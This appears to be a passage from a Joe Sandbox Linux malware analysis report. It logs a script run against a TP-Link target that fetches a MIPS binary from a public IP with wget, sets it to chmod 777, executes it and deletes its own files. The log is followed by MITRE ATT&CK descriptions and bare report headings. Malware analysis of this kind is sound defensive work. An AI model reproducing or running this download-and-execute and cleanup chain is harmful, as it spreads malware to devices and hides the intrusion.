Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	/bin/sh ./shk tplink
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -rf system
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -rf mips
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/wget
Arguments:	wget http://185.224.128.34/mips -O system
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/tmp/system
Arguments:	./system tplink
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/tmp/system
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/tmp/system
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	08:24:48
Start date (UTC):	29/03/2024
Path:	/tmp/system
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: sh PID: 6233, Parent PID: 6216

General

Start time (UTC):	08:24:49
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:49
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -rf system
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:24:49
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:49
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -rf shk
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:26:18
Start date (UTC):	29/03/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:26:18
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:26:18
Start date (UTC):	29/03/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:26:18
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Dropped Files

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/shk

/tmp/system

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: sh PID: 6211, Parent PID: 6128

General

Chronological Activities

Analysis Process: sh PID: 6212, Parent PID: 6211

General

Chronological Activities

Analysis Process: rm PID: 6212, Parent PID: 6211

General

Chronological Activities

Analysis Process: sh PID: 6213, Parent PID: 6211

General

Chronological Activities

Analysis Process: wget PID: 6213, Parent PID: 6211

General